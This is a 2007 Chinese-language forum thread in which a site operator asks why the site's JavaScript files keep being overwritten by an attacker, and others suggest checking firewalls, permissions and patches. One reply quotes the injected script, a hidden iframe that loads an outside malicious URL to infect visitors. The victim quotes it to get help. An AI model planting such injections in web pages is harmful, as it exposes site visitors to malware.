台灣最大程式設計社群網站
線上人數
1374
 
會員總數:246277
討論主題:189812
歡迎您免費加入會員
討論區列表 >> 網管 / 資安 / VM >> 網站JS檔一直被駭客覆寫,windows,防毒全都更新完了,還有啥方法可以救嗎?
[]  
[我要回覆]
1
回應主題 加入我的關注話題 檢舉此篇討論 將提問者加入個人黑名單
網站JS檔一直被駭客覆寫,windows,防毒全都更新完了,還有啥方法可以救嗎?
價值 : 100 QP  點閱數:2687 回應數:9
樓主

Aptiva
初學者
70 13
274 10
發送站內信

各位先進∼
如題,真的傷腦筋很久了∼一直被改寫
都不知道對方怎麼進來的∼
電腦重灌也沒用∼
知道手法的∼麻煩提供您的高見

本篇文章發表於2007-04-02 16:09
1樓
回應

Allen
捐贈 VP 給 Allen 檢舉此回應
請問您網站是租用空間,或自己有server?
有提供上傳檔案的功能嗎?
本篇文章回覆於2007-04-03 09:03
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
2樓
請詳細描述您的軟硬體環境
有無防火牆
是否有封鎖不該開放的PORT 等等........
本篇文章回覆於2007-04-03 09:16
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
3樓
回應

溫子
捐贈 VP 給 溫子 檢舉此回應
提供主機位置讓大家打看看就知道問題點了 =_=+
本篇文章回覆於2007-04-03 10:02
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
4樓
作者回應

Aptiva
檢舉此回應
謝謝大家的回覆
有自己的主機架在Hinet IDC, OS是M$ 2003, DB在另一台server
所以安全設備方面可以比照Hinet,公司是租用專線通往Hinet IDC
之前有聽說Hinet有安全上的問題∼他們應該修補了吧∼不過到現在∼檔案還是一直被覆寫中
研判應該是透過程式寫好的東西一直攻擊
有沒有辦法可以查到相關的log呢?
不好意思∼因為∼這是公司的東西,不方便透露位置
再次謝謝大家
本篇文章回覆於2007-04-03 12:51
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
5樓
回應

溫子
捐贈 VP 給 溫子 檢舉此回應
就算在 Hinet IDC 也不見得你就得到了防護,
要看你有沒有和 Hinet 申請IDC防護機制(防火牆),
這是額外的支出~~~

同常會將主機放在IDC也會順手購置一台防火牆來保護,
也不會去使用 Hinet 的防火牆業務,不是不信任 Hinet 的設備與技術,
只是既然錢都要丟在 IDC 裡面了,為了遠端管理上的方便,
也許會用到多家 ISP 線路的備援,甚至於需要用到 VPN 的情況,
通常這些建置要 Hinet 來做可能費用更高!!
本篇文章回覆於2007-04-03 21:29
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
6樓
作者回應

Aptiva
檢舉此回應
我敘述一下目前的手法
駭客會一直改寫的的js檔,在裡面加上語法
其語法為document.write('<iframe src=http://www.ipqwe.com/app/helptop.do?id=ad003 width=100 height=0></iframe>');
去開啟看不到的網站連結,讓使用者中木馬
請問有人遇過這是使用什麼手法入侵的嗎?要怎麼補這個漏洞?
目前只能夠寫一支每半小時定期將js覆寫上去來解這個問題,但畢竟這是治標不治本而且有時間差的爛方法∼
請各位有經驗的人∼協助看看吧∼
雖然我不是網管的人,不過網管一直推說是程式上的漏洞,我只能夠確定,程式並沒有任何上傳的機制,
謝謝大家

本篇文章回覆於2007-04-04 18:43
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
7樓
作者回應

Aptiva
檢舉此回應
剛剛發現, Hinet理財網發生的問題跟我的相似
請看大砲開講http://malware-test.com/blog/archives/2007/03/31/919#comment-1690
請問這有沒有解法?還是因為放在Hinet IDC,用他們的防火牆就會這樣?要靠他們來解決?
本篇文章回覆於2007-04-04 19:10
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
8樓
最有價值解答

溫子
捐贈 VP 給 溫子 檢舉此回應
並不是你認為程式沒有上傳機制,別人就不能用 GET 傳值的方式引用外在的檔案,
然後開出一個上傳的窗口,這個要說說不完,再說溫子又不是 Windows 的應用開發者!!

如果把這個js檔的權限設定為除了 administrator 才可以寫入,其他帳號權限只有讀取不知道可不可以解決,
連 iis 都是用 administrator 運行的話 =_=+ 那就太糟糕了~~~~

PS:這的確不一定是防火牆可以擋下來~
本篇文章回覆於2007-04-04 22:10
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
9樓
作者回應

Aptiva
檢舉此回應
目前上完M$最新修補後,已經沒有該情況了,也不知道是把洞補起來了∼還是攻擊者要休息一下?
先謝謝大家了
本篇文章回覆於2007-04-13 09:23
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
   
1

回覆
如要回應,請先登入.